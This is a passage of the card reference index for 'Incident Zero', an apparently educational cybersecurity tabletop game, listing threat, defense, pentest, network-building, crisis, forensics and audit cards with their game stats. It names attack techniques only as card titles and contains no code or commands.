| T-02 | Watering Hole Attack | INITIAL COMPROMISE | WEB EXPLOIT |
| T-03 | Compromised Credentials | INITIAL COMPROMISE | CREDENTIAL ABUSE |
| T-04 | Lateral Movement via SMB | PIVOT & ESCALATE | NETWORK |
| T-05 | Privilege Escalation via Kernel Exploit | PIVOT & ESCALATE | MALWARE |
| T-06 | Mimikatz Credential Dumping | PIVOT & ESCALATE | CREDENTIAL ABUSE |
| T-07 | Scheduled Task Persistence | PERSISTENCE | MALWARE |
| T-08 | Registry Run Key Persistence | PERSISTENCE | MALWARE |
| T-09 | Beaconing to C2 Server | C2 & EXFIL | NETWORK |
| T-10 | SQL Database Exfiltration | C2 & EXFIL | DATA EXFIL |
| T-11 | Ransomware Payload Deployment | C2 & EXFIL | MALWARE |
| T-12 | Browser Extension Backdoor | C2 & EXFIL | DATA EXFIL |
By step: INITIAL COMPROMISE 3 (T-01–03) · PIVOT & ESCALATE 3 (T-04–06) · PERSISTENCE 2 (T-07–08) · C2 & EXFIL 4 (T-09–12).
| Card ID | Title | Step | Vector |
|---|---|---|---|
| T-13 | Compromised Software Vendor Update | INITIAL COMPROMISE | MALWARE |
| T-14 | Malicious Third-Party Library Injection | INITIAL COMPROMISE | MALWARE |
| T-15 | Malicious Insider Data Theft | C2 & EXFIL | DATA EXFIL |
| T-16 | Disgruntled Employee Sabotage | PIVOT & ESCALATE | MALWARE |
| T-17 | Compromised IoT Device as Pivot Point | INITIAL COMPROMISE | NETWORK |
| T-18 | Cloud API Token Theft & Abuse | PIVOT & ESCALATE | CREDENTIAL ABUSE |
| T-19 | DNS Tunneling Data Exfiltration | C2 & EXFIL | DATA EXFIL |
| T-20 | Physical Access + Badge Cloning Attack | INITIAL COMPROMISE | CREDENTIAL ABUSE |
Distribution: 4 BASIC (10 Budget) / 8 ADVANCED (15 Budget) / 7 ELITE (25 Budget).
| Card ID | Title | Tier (Cost) | Vector |
|---|---|---|---|
| D-25 | Application Whitelisting | BASIC (10) | MALWARE |
| D-26 | Advanced Application Control with AI | ADVANCED (15) | MALWARE |
| D-27 | Living-Off-The-Land Blocker | ELITE (25) | MALWARE |
| D-28 | Baseline Behavior Learning System | ADVANCED (15) | NETWORK |
| D-29 | Process Behavior Analysis | ADVANCED (15) | MALWARE |
| D-30 | Machine Learning Anomaly Detection | ELITE (25) | MALWARE |
| D-31 | Container Image Scanning | BASIC (10) | MALWARE |
| D-32 | Container Runtime Protection | ADVANCED (15) | MALWARE |
| D-33 | Kubernetes Network Policy & RBAC | ELITE (25) | NETWORK |
| D-34 | Cloud Configuration Auditing | BASIC (10) | CREDENTIAL ABUSE |
| D-35 | Cloud Access & Permission Auditing | ADVANCED (15) | CREDENTIAL ABUSE |
| D-36 | Cloud Compliance & Audit Trail | ELITE (25) | DATA EXFIL |
| D-37 | Playbook: Ransomware Response | ADVANCED (15) | MALWARE |
| D-38 | Playbook: Credential Compromise Response | ADVANCED (15) | CREDENTIAL ABUSE |
| D-39 | Playbook: Insider Threat Response | ELITE (25) | DATA EXFIL |
| D-40 | Playbook: Supply Chain Breach Response | ELITE (25) | WEB EXPLOIT |
| D-41 | Backup Strategy - 3-2-1 Rule | BASIC (10) | MALWARE |
| D-42 | Immutable Backup Storage | ADVANCED (15) | MALWARE |
| D-43 | Disaster Recovery Plan & Testing | ELITE (25) | MALWARE |
24 cards (D-01 – D-24), indexed once. The same deck appears in full in both module folders:
Print one physical set and use it in both modules.
Distribution by tier (v2.2): 8 BASIC (D-01–06, D-19, D-23) / 8 ADVANCED (D-07–12, D-18, D-24) / 8 ELITE (D-13–17, D-20–22).
| Card ID | Title | Tier (Cost) | Vector |
|---|---|---|---|
| D-01 | Email Authentication Setup | BASIC (10) | SOCIAL ENGINEERING |
| D-02 | User Security Training | BASIC (10) | SOCIAL ENGINEERING |
| D-03 | Windows Update Patching | BASIC (10) | WEB EXPLOIT |
| D-04 | Network Firewall Rules | BASIC (10) | NETWORK |
| D-05 | Log Centralization | BASIC (10) | MALWARE |
| D-06 | Basic Antivirus Deployment | BASIC (10) | MALWARE |
| D-07 | Multi-Factor Authentication (MFA) | ADVANCED (15) | CREDENTIAL ABUSE |
| D-08 | EDR (Endpoint Detection & Response) | ADVANCED (15) | MALWARE |
| D-09 | Network Segmentation | ADVANCED (15) | NETWORK |
| D-10 | SIEM Correlation Rules | ADVANCED (15) | NETWORK |
| D-11 | Data Loss Prevention (DLP) | ADVANCED (15) | DATA EXFIL |
| D-12 | Password Manager & Vault | ADVANCED (15) | CREDENTIAL ABUSE |
| D-13 | Threat Hunting Program | ELITE (25) | MALWARE |
| D-14 | Memory Forensics | ELITE (25) | MALWARE |
| D-15 | Deception Technology (Honeypots) | ELITE (25) | NETWORK |
| D-16 | Credential Guard & Secure Boot | ELITE (25) | CREDENTIAL ABUSE |
| D-17 | Advanced Malware Sandbox | ELITE (25) | MALWARE |
| D-18 | Intrusion Prevention System (IPS) | ADVANCED (15) | WEB EXPLOIT |
| D-19 | Backup & Disaster Recovery | BASIC (10) | MALWARE |
| D-20 | Zero Trust Access Control | ELITE (25) | CREDENTIAL ABUSE |
| D-21 | Container Security & Orchestration | ELITE (25) | MALWARE |
| D-22 | Security Information & Event Management (SIEM) | ELITE (25) | NETWORK |
| D-23 | IR Program & Runbooks | BASIC (10) | NETWORK |
| D-24 | Threat Intelligence Integration | ADVANCED (15) | NETWORK + DATA EXFIL (dual-tagged) |
Distribution by vector (v2.2): SOCIAL ENGINEERING 2 · WEB EXPLOIT 2 · CREDENTIAL ABUSE 4 · MALWARE 8 · NETWORK 7 · DATA EXFIL 2. D-24 is dual-tagged (NETWORK + DATA EXFIL), so vector tags sum to 25 across 24 cards.
Module total: 16 tactic cards + the Shared Defense Deck (24 cards, indexed above).
| Deck | File | Card IDs | Count | Description |
|---|---|---|---|---|
| Defense Cards (shared) | defense-cards.md | D-01 – D-24 | 24 | Same deck as IR core — see Shared Defense Deck |
| Core Pentester Tactics | pentester-tactic-cards.md | PT-01 – PT-08 | 8 | Red-team tactics that test deployed defenses (d20 vs DC) |
| Expansion Tactics | advanced-tactics.md | PT-09 – PT-16 | 8 | Multi-vector, zero-day, ransomware, APT, cloud/IoT/firmware/container attacks |
| Card ID | Title | Difficulty (DC) | Target Vectors |
|---|---|---|---|
| PT-01 | Social Engineering - Pretexting Attack | BASIC (DC 12) | SOCIAL_ENGINEERING, CREDENTIAL_ABUSE |
| PT-02 | Malware Evasion - Living-off-the-Land Technique | INTERMEDIATE (DC 13) | MALWARE, CREDENTIAL_ABUSE |
| PT-03 | Credential Dumping - Mimikatz Attack | INTERMEDIATE (DC 13) | CREDENTIAL_ABUSE, MALWARE |
| PT-04 | Lateral Movement - Network Traversal | INTERMEDIATE (DC 13) | NETWORK, CREDENTIAL_ABUSE |
| PT-05 | Privilege Escalation - Unpatched Kernel Exploit | ADVANCED (DC 14) | MALWARE, WEB_EXPLOIT |
| PT-06 | Data Exfiltration - Unmonitored Channel | ADVANCED (DC 14) | DATA_EXFIL, NETWORK |
| PT-07 | Supply Chain Compromise - Trusted Software Update | ADVANCED (DC 14) | MALWARE, WEB_EXPLOIT |
| PT-08 | Insider Threat - Malicious Administrator | EXPERT (DC 15) | CREDENTIAL_ABUSE, DATA_EXFIL, NETWORK |
| Card ID | Title | Difficulty (DC) | Target Vectors |
|---|---|---|---|
| PT-09 | Multi-Vector Attack - Coordinated Campaign | ADVANCED (DC 14) | Multiple (per-phase rolls) |
| PT-10 | Zero-Day Exploitation - Unknown Vulnerability | EXPERT (DC 15) | MALWARE, WEB_EXPLOIT |
| PT-11 | Ransomware Deployment & Encryption | EXPERT (DC 15) | MALWARE, DATA_EXFIL, NETWORK |
| PT-12 | APT Campaign - Multi-Turn Persistent Threat | EXPERT+ (DC 16, escalates +1/turn undetected) | Multiple |
| PT-13 | Cloud-Specific Attack - Misconfigured Cloud Resources | ADVANCED (DC 14) | Multiple |
| PT-14 | IoT/OT Compromise - Industrial Network Attack | ADVANCED (DC 14) | NETWORK, MALWARE |
| PT-15 | Firmware/BIOS Attack - Bootloader Compromise | EXPERT (DC 15) | MALWARE, NETWORK |
| PT-16 | Privilege Escalation - Containerized Environment Escape | EXPERT (DC 15) | MALWARE, NETWORK |
Module total: 77 cards (33 core + 8 expansion + 36 standalone).
| Deck | File | Card IDs | Count | Description |
|---|---|---|---|---|
| Servers | server-cards.md | SRV-01 – SRV-10 | 10 | Server types with cost, capacity, complexity, and availability |
| Security Devices | security-device-cards.md | SEC-01 – SEC-10 | 10 | Security appliances with cost, vectors covered, and placement |
| Architectures | architecture-cards.md | ARCH-01 – ARCH-05 | 5 | Network topology choices with cost/complexity trade-offs |
| Assets | asset-cards.md | ASSET-01 – ASSET-08 | 8 | Business functions the network must support |
| Legacy Systems (exp.) | legacy-systems.md | LEGACY-01 – LEGACY-04 | 4 | Unpatched, mission-critical legacy burdens |
| Cloud Variants (exp.) | cloud-variants.md | CLOUD-01 – CLOUD-04 | 4 | Modern cloud deployment alternatives |
| Business Requirements (standalone) | business-requirement-cards.md | REQ-01 – REQ-20 | 20 | Draw-deck requirements for standalone play |
| Operational Events (standalone) | operational-event-cards.md | EVT-01 – EVT-16 | 16 | Draw-deck operational events for standalone play |
| Card ID | Title | Cost | Key Risk |
|---|---|---|---|
| SRV-01 | Email Server | 8 | Phishing, Credential Abuse |
| SRV-02 | Web Server | 7 | Web Exploits, RCE |
| SRV-03 | Database Server | 10 | SQL Injection, Data Exfil |
| SRV-04 | File Server | 6 | SMB Laterals, Ransomware |
| SRV-05 | Domain Controller | 12 | Mimikatz, Complete Compromise |
| SRV-06 | Development Server | 5 | Lateral Movement, Data Leak |
| SRV-07 | Backup Server | 9 | Ransomware, Recovery Failure |
| SRV-08 | Cloud Workload | 4 | Misconfiguration, IAM Abuse |
| SRV-09 | Legacy System | 3 | Known Vulns, Cannot Patch |
| SRV-10 | Honeypot Decoy | 7 | Detection, Early Warning |
| Card ID | Title | Cost | Primary Vectors / Placement |
|---|---|---|---|
| SEC-01 | Firewall (Perimeter) | 12 | NETWORK, CREDENTIAL / Perimeter |
| SEC-02 | Intrusion Detection System (IDS) | 10 | MALWARE, NETWORK / Internal |
| SEC-03 | Intrusion Prevention System (IPS) | 14 | MALWARE, WEB, NETWORK / Internal |
| SEC-04 | Load Balancer | 8 | NETWORK (availability) / Web Tier |
| SEC-05 | VPN Gateway | 9 | CREDENTIAL, NETWORK / Perimeter |
| SEC-06 | Email Gateway | 6 | SOCIAL_ENG, MALWARE / Perimeter |
| SEC-07 | Web Application Firewall (WAF) | 11 | WEB, MALWARE / Web Tier |
| SEC-08 | Network Segmentation Switch | 10 | CREDENTIAL, NETWORK / Internal |
| SEC-09 | SIEM (Security Information & Event Management) | 15 | Multiple (detection) / Central |
| SEC-10 | Honeypot Network | 8 | NETWORK (detection) / Isolated |
| Card ID | Title | Cost | Complexity |
|---|---|---|---|
| ARCH-01 | Flat Network (Traditional) | 0 | 1/5 |
| ARCH-02 | Segmented 3-Zone (DMZ Model) | 5 | 2/5 |
| ARCH-03 | Fully Isolated (Zero Trust Model) | 12 | 4/5 |
| ARCH-04 | Cloud Hybrid (Mixed On-Premises & Cloud) | 8 | 3/5 |
| ARCH-05 | Cloud First (Cloud-Only Infrastructure) | 6 | 2/5 |
| Card ID | Title | Criticality | Fulfilled By |
|---|---|---|---|
| ASSET-01 | High | SRV-01 | |
| ASSET-02 | Web | Medium | SRV-02 |
| ASSET-03 | Database | Very High | SRV-03 |
| ASSET-04 | File Storage | High | SRV-04 |
| ASSET-05 | Identity | Very High | SRV-05 |
| ASSET-06 | Development | Medium | SRV-06 |
| ASSET-07 | Disaster Recovery | Very High | SRV-07 |
| ASSET-08 | VPN/Remote Access | Medium | SEC-05 |
| Card ID | Title | Cost | Key Challenge |
|---|---|---|---|
| LEGACY-01 | Mainframe System | 15 | Cannot patch, mission-critical |
| LEGACY-02 | Custom Business Application | 8 | Vendor no longer exists |
| LEGACY-03 | Industrial Control System (ICS) | 12 | Real-time + safety-critical |
| LEGACY-04 | Obsolete Operating System | 5 | All vulnerabilities public |
| Card ID | Title | Cost | Primary Benefit |
|---|---|---|---|
| CLOUD-01 | Containerized Microservices | 6 | Scalability & Velocity |
| CLOUD-02 | Serverless/Function-as-a-Service | 3 | Simplicity & Cost |
| CLOUD-03 | Database-as-a-Service (Managed Database) | 5 | Reliability & Compliance |
| CLOUD-04 | Content Delivery Network (CDN) | 4 | Performance & DDoS Protection |
| Card ID | Title | Satisfied By | Missed Penalty |
|---|---|---|---|
| REQ-01 | New Product Launch Website | Web Server or cloud web | -5 |
| REQ-02 | Customer Data Acquisition | Database (dedicated or cloud) | -10 |
| REQ-03 | Work-From-Home Program | VPN Gateway | -3 |
| REQ-04 | Remote Workforce Mandate | VPN Gateway + Domain Controller | -5 |
| REQ-05 | HIPAA Compliance Mandate | Backup + segmentation | -10 |
| REQ-06 | PCI Scope: Cardholder Data | Database + Firewall/Segmentation | -10 |
| REQ-07 | 99.9% Uptime SLA | Load Balancer or duplicate server | -5 |
| REQ-08 | M&A: Integrate Acquired Network | 2 spare slots or new server | -10 |
| REQ-09 | Scale Email System | 2nd Email Server / LB / cloud email | -5 |
| REQ-10 | Security Audit Ordered | SIEM, or IDS + Email Gateway | -5 |
| REQ-11 | Board Demands IR Readiness | IDS, IPS, or SIEM | -10 |
| REQ-12 | Ransomware Wave in Sector | Backup + detection | -20 |
| REQ-13 | New Subsidiary Office | VPN Gateway | -5 |
| REQ-14 | E-Commerce Expansion | Web + WAF | -5 |
| REQ-15 | Developer Hiring Spree | Dev Server or overload | -3 |
| REQ-16 | Records-Retention Regulation | File storage + Backup | -5 |
| REQ-17 | Single Sign-On Rollout | Domain Controller | -5 |
| REQ-18 | Cyber-Insurance Renewal | Backup + Email Gateway + detection | -5 (met: +5) |
| REQ-19 | Threat-Intel Pilot | Honeypot | 0 (met: +5) |
| REQ-20 | Data-Center Consolidation | Any cloud-hosted service | -3 (met: +3) |
| Card ID | Title | Effect (Unmitigated) | Mitigated By |
|---|---|---|---|
| EVT-01 | Email Server Failure | Pay 5 or -10 pts | Redundant/cloud email |
| EVT-02 | Traffic Spike | -5 pts (or +5 if ready) | LB / CDN / redundant web |
| EVT-03 | Phishing Wave | -10 pts (or +5 if ready) | Email Gateway |
| EVT-04 | Cloud Vendor Outage | -5 pts if cloud-only service | On-prem redundancy |
| EVT-05 | Budget Cut | -5 Budget | Contingency reserve |
| EVT-06 | Emergency Funds | +10 Budget | — |
| EVT-07 | Security Grant | +5 Budget if Backup | — |
| EVT-08 | File Server Filling Up | Buy capacity or -5 pts | Spare capacity |
| EVT-09 | Honeypot Triggers | +5 pts if honeypot | — |
| EVT-10 | Insider Snooping | -5 pts (or +5 if ready) | SIEM / segmentation |
| EVT-11 | Ransomware Strikes | -20 pts | Backup (+ detection: +5) |
| EVT-12 | IT Staff Burnout | Max 1 deploy this turn | Completed builds |
| EVT-13 | Vendor Promotion | Next device -2 cost | — |
| EVT-14 | New Hire Needs Remote Access | -3 pts | VPN Gateway |
| EVT-15 | Hardware Recall | Pay 3 or server offline | Redundancy / cloud |
| EVT-16 | Quiet Quarter | Nothing | — |
Module total: 38 cards (30 core + 8 expansion scenarios).
| Deck | File | Card IDs | Count | Description |
|---|---|---|---|---|
| Crisis Actions | crisis-action-cards.md | ACTION-01 – ACTION-13 | 13 | Investigation, Remediation, Communication actions plus the Ransom Decision |
| Event Timeline | event-cards.md | EVENT-01 – EVENT-12 | 12 | 6 Scheduled + 6 Triggered crisis events on the 8-turn Crisis Clock |
| Stakeholders | stakeholder-cards.md | STAKE-01 – STAKE-05 | 5 | Trust meters for the five stakeholder groups |
| Advanced Scenarios (exp.) | advanced-scenarios.md | SCENARIO-01 – SCENARIO-08 | 8 | High/extreme-difficulty crisis setups |
| Card ID | Title | Category | Cost | Advance | Duration |
|---|---|---|---|---|---|
| ACTION-01 | Forensic Analysis | Investigation | 12 | +25% | 2 turns |
| ACTION-02 | Threat Hunting | Investigation | 8 | +15% | 1 turn |
| ACTION-03 | Log Analysis | Investigation | 5 | +10% | 1 turn |
| ACTION-04 | Third-Party Incident Response Engagement | Investigation | 20 | +30% Inv / +20% Rem | 3 turns |
| ACTION-05 | Patch & Harden (Affected Systems) | Remediation | 10 | +20% | 1 turn |
| ACTION-06 | Containment (Isolate Compromised Systems) | Remediation | 8 | +15% | 1 turn |
| ACTION-07 | System Rebuild/Recovery from Backup | Remediation | 15 | +25% | 2 turns |
| ACTION-08 | Change Credentials & Access Controls | Remediation | 6 | +12% | 1 turn |
| ACTION-09 | Customer Notification | Communication | 10 | +20% | 1 turn |
| ACTION-10 | Regulatory/Law Enforcement Notification | Communication | 8 | +10% | 1 turn |
| ACTION-11 | Media/Public Relations Management | Communication | 12 | +15% | 1 turn |
| ACTION-12 | Board & Shareholder Communication | Communication | 9 | +12% | 1 turn |
| ACTION-13 | Ransom Decision (v2.2) | Crisis Decision | 0/5/20 | Pay: +20% Rem | Instant (once per game) |
Standing rule (not a card): the free Holding Statement — Communication, 0 Budget, +5%.
| Card ID | Title | Kind | Turn / Trigger |
|---|---|---|---|
| EVENT-01 | First Media Coverage | Scheduled | Turn 2 |
| EVENT-02 | Regulatory 72-Hour Deadline | Scheduled | Turn 6 (deadline Turn 8) |
| EVENT-03 | Customer Notification Window | Scheduled | Turn 5 |
| EVENT-04 | Board Meeting | Scheduled | Turn 3 |
| EVENT-05 | Customer Class Action Lawsuit | Triggered | Customers un-notified after T5 or trust <20% |
| EVENT-06 | Regulatory Fine | Triggered | Regulator trust <20% |
| EVENT-07 | Media Frenzy | Triggered | Media <20% or silent through T3 |
| EVENT-08 | Second Breach Discovered | Triggered | T6: Remediation <30%, no rebuild |
| EVENT-09 | Shareholder Pressure | Scheduled | Turn 5 (public co.) |
| EVENT-10 | Competitor Advantage | Triggered | Customer trust <40% from T5 |
| EVENT-11 | Key Executive Resignation | Triggered | Executive trust <30% |
| EVENT-12 | Government Subpoena | Scheduled | Turn 7 (med/large org) |
| Card ID | Title | Type | Starting Trust |
|---|---|---|---|
| STAKE-01 | Customers | External | 50% |
| STAKE-02 | Regulators | Government | 60% |
| STAKE-03 | Media / Public | External | 40% |
| STAKE-04 | Board of Directors | Internal | 70% |
| STAKE-05 | Executive Leadership | Internal | 80% |
| Card ID | Title | Difficulty | Key Pressure |
|---|---|---|---|
| SCENARIO-01 | Multi-Region Breach with Data Sovereignty Issues | HIGH | 3 different regulatory timelines |
| SCENARIO-02 | Ransomware with Extortion Threat | HIGH | $10M decision + data publication threat |
| SCENARIO-03 | Supply Chain Compromise (Vendor Breach Affects Customers) | HIGH | Vendor failure, customer trust |
| SCENARIO-04 | Insider Threat Revealed Mid-Crisis | HIGH | Organizational trust collapse |
| SCENARIO-05 | Critical Infrastructure Breach (Safety/Lives at Risk) | EXTREME | Lives at risk, government control |
| SCENARIO-06 | Stock Price Crash (Public Company Panic) | HIGH | Financial crisis + board pressure |
| SCENARIO-07 | Ransomware + Data Breach + Business Email Compromise | EXTREME | 3 simultaneous attacks, multiple ransoms |
| SCENARIO-08 | Breach During Merger/Acquisition | EXTREME | Deal value + regulatory blocks |
Module total: 28 core cards (12 Investigation + 12 Evidence + 4 Findings). Expansion deck: PLANNED — not yet available (no card file exists yet; see the module README's design notes).
| Deck | File | Card IDs | Count | Description |
|---|---|---|---|---|
| Investigation Actions | investigation-cards.md | DISK-01/02, MEM-01/02, LOG-01/02, NET-01/02, MALW-01/02, TIMELINE-01, THREAT-01 | 12 | Forensic techniques rolled d20 vs DC, with Budget cost and Duration |
| Evidence & Findings | evidence-cards.md | EVD-01 – EVD-12, FIND-01 – FIND-04 | 16 | Discovered evidence artifacts and synthesis/conclusion cards |
| Card ID | Title | DC | Cost | Duration |
|---|---|---|---|---|
| DISK-01 | Disk Image & Analysis | 12 | 10 | 2 turns (rush: +5 Budget for 1) |
| DISK-02 | File System Carving | 14 | 15 | 3 turns |
| MEM-01 | Memory Dump & Analysis | 13 | 15 | 2 turns |
| MEM-02 | Memory Forensics Deep Dive | 15 | 20 | 3 turns |
| LOG-01 | Event Log Analysis | 11 | 5 | 1 turn |
| LOG-02 | Deep Log Correlation | 13 | 10 | 2 turns |
| NET-01 | Network Traffic Analysis | 12 | 10 | 2 turns |
| NET-02 | Packet Capture Deep Analysis | 14 | 15 | 3 turns |
| MALW-01 | Malware Analysis (Dynamic) | 12 | 15 | 2 turns |
| MALW-02 | Malware Analysis (Static) | 14 | 10 | 2 turns |
| TIMELINE-01 | Timeline Reconstruction | 13 | 5 | 1 turn |
| THREAT-01 | Threat Attribution Analysis | 15 | 20 | 3 turns |
| Card ID | Title | Type |
|---|---|---|
| EVD-01 | Credential Dumper Malware | Malware & Persistence |
| EVD-02 | Command-and-Control Callback Domain | Attack Infrastructure |
| EVD-03 | Persistence Mechanism (Scheduled Task) | Malware & Persistence |
| EVD-04 | Suspicious Admin Login (Timeline) | Credentials & Access |
| EVD-05 | Lateral Movement Evidence (Pass-the-Hash) | Lateral Movement |
| EVD-06 | Data Exfiltration Evidence | Exfiltration |
| EVD-07 | Attacker Infrastructure Map | Attack Infrastructure |
| EVD-08 | Encryption Keys Recovered | Malware & Persistence |
| EVD-09 | Attacker Command History | Attack Activity |
| EVD-10 | Malware Behavior Profile | Malware & Persistence |
| EVD-11 | File Staging Artifacts | Attack Activity |
| EVD-12 | Anti-Forensics Evidence | Attack Activity |
| Card ID | Title | Triggered When |
|---|---|---|
| FIND-01 | Threat Attribution Report | Attribution Confidence ≥ 70% |
| FIND-02 | Attack Surface Analysis | Attack Chain ≥ 75% |
| FIND-03 | Persistence Mechanisms Discovered | Multiple persistence artifacts found |
| FIND-04 | Investigative Gaps & Recommendations | Investigation completes (Victory or Failure) |
Module total: 25 cards (6 core + 19 expansion). The expansion — 11 framework cards and 8 remediation cards — lives entirely in one file.
| Deck | File | Card IDs | Count | Description |
|---|---|---|---|---|
| Audit Domains | audit-domain-cards.md | DOMAIN-01 – DOMAIN-06 | 6 | Domain assessments scored 1-5 stars with PASS/FAIL mapping |
| Frameworks & Remediation (exp.) | compliance-frameworks.md | FRAMEWORK-NIST-01–05, FRAMEWORK-CIS-01–03, FRAMEWORK-PCI-01–03, REMEDIATION-01–08 | 19 | Framework assessment variants (5 NIST + 3 CIS + 3 PCI) plus 8 remediation actions |
| Card ID | Title | Focus |
|---|---|---|
| DOMAIN-01 | Network Segmentation & Isolation | Network zones, lateral movement prevention |
| DOMAIN-02 | Access Control & Identity Management | MFA, credential policy |
| DOMAIN-03 | Threat Detection & Incident Response | SIEM, breach detection |
| DOMAIN-04 | Backup & Disaster Recovery | Backups, ransomware resilience |
| DOMAIN-05 | Third-Party Risk & Cloud Security | Vendor and supply chain risk |
| DOMAIN-06 | Security Operations & Monitoring | Security team, sustained posture |
| Card ID | Title | Focus |
|---|---|---|
| FRAMEWORK-NIST-01 | Identify Function | Asset inventory and risk assessment |
| FRAMEWORK-NIST-02 | Protect Function | Preventive security controls |
| FRAMEWORK-NIST-03 | Detect Function | Detecting attacks as they happen |
| FRAMEWORK-NIST-04 | Respond Function | Responding to breaches/attacks |
| FRAMEWORK-NIST-05 | Recover Function | Recovery and improvement |
| FRAMEWORK-CIS-01 | Safeguards 1-6 (Foundations) | Basic security practices |
| FRAMEWORK-CIS-02 | Safeguards 7-13 (Advanced Defenses) | IR, supply chain, defense tools |
| FRAMEWORK-CIS-03 | Safeguards 14-18 (Operations & Governance) | Operational controls |
| FRAMEWORK-PCI-01 | Infrastructure Security (Requirements 1-4) | Network/system security for cardholder data |
| FRAMEWORK-PCI-02 | Access & Operations (Requirements 5-10) | Access control and operations |
| FRAMEWORK-PCI-03 | Testing & Compliance (Requirements 11-12) | Testing, monitoring, compliance management |
| Card ID | Title | Cost |
|---|---|---|
| REMEDIATION-01 | Implement MFA | 5 |
| REMEDIATION-02 | Deploy SIEM | 15 |
| REMEDIATION-03 | Implement Network Segmentation | 12 |
| REMEDIATION-04 | Backup & Disaster Recovery | 10 |
| REMEDIATION-05 | Security Training Program | 3 |
| REMEDIATION-06 | Vendor Security Assessment | 5 |
| REMEDIATION-07 | Vulnerability Management Program | 8 |
| REMEDIATION-08 | Incident Response Plan & Team | 12 |
| Module | Core | Expansion | Standalone | Total |
|---|---|---|---|---|
| Incident Response | 12 threats + 24 defenses* | 8 threats + 19 defenses | — | 63 |
| Hardening | 8 tactics (+ shared 24 defenses*) | 8 tactics | — | 16 (+24 shared) |
| Network Building | 33 | 8 | 36 | 77 |
| Disaster Recovery | 30 | 8 | — | 38 |
| Forensics | 28 | planned | — | 28 |
| Audit & Compliance | 6 | 19 | — | 25 |
* The 24 defense cards (D-01 – D-24) are one shared deck counted once (under Incident Response) in the 247-card grand total.
All cards are licensed under CC BY-NC-SA 4.0 (Creative Commons Attribution-NonCommercial-ShareAlike).
Incident Zero: Card Reference Index Version 2.2 - Playtest Edition Generated from the card files — the card files are canonical.